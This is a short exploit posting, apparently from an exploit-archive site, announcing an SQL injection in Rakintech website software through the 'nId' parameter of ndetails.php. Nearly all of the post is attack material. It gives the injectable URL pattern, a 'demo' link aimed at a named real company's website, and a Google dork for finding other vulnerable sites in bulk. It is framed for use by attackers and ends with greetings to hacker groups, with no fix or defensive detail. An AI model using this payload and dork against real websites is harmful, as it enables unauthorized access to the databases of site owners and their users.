Rakintech SQL Injection

2012.11.06
Credit: Samim.s
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

************************************************************************************************** | @@@@@@@@ @@@@@@@@@ @@ @@ @@@@@ @@ @@ @@@@@@@@ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ | | @@@@@@@@ @@@ @@@ @ @ @ @ @ @ @ @ @ @@@@@@@@ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @ | | @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ | | @@@@@@@@ @ @ @ @ @ @@@@@ @ @ @ @@@ @@@@@@@@ | ************************************************************************************************** ================================================================================================== # [~] Exploit Title: Rakintech SQL Injection Bug # # [~] Google Dork : " Bottom Of The Exploit " # # [~] Date: 11/05/2012 (Mo) # # [~] Exploit Author: Samim.s # # [~] Version: ALL Versions & ALL Languages # # [~] Tested on: Windows 8 # # [~] Support WebSite : Rakintech.CoM # ================================================================================================== # [+] RFU Exploit : # # http://WebSite.Com/[path]/ndetails.php?nId=[SQLi] # # [+] Demo : # # http://www.rakprecast.com/ndetails.php?nId=13' # # ---------------------------------------------------------------------------------------------- # # [+] Dork : # # inurl:"ndetails.php?nId=" # ================================================================================================== # [*] GreetZ To: MrMosiHaCker + ALL Persian HaCkers # ==================================================================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top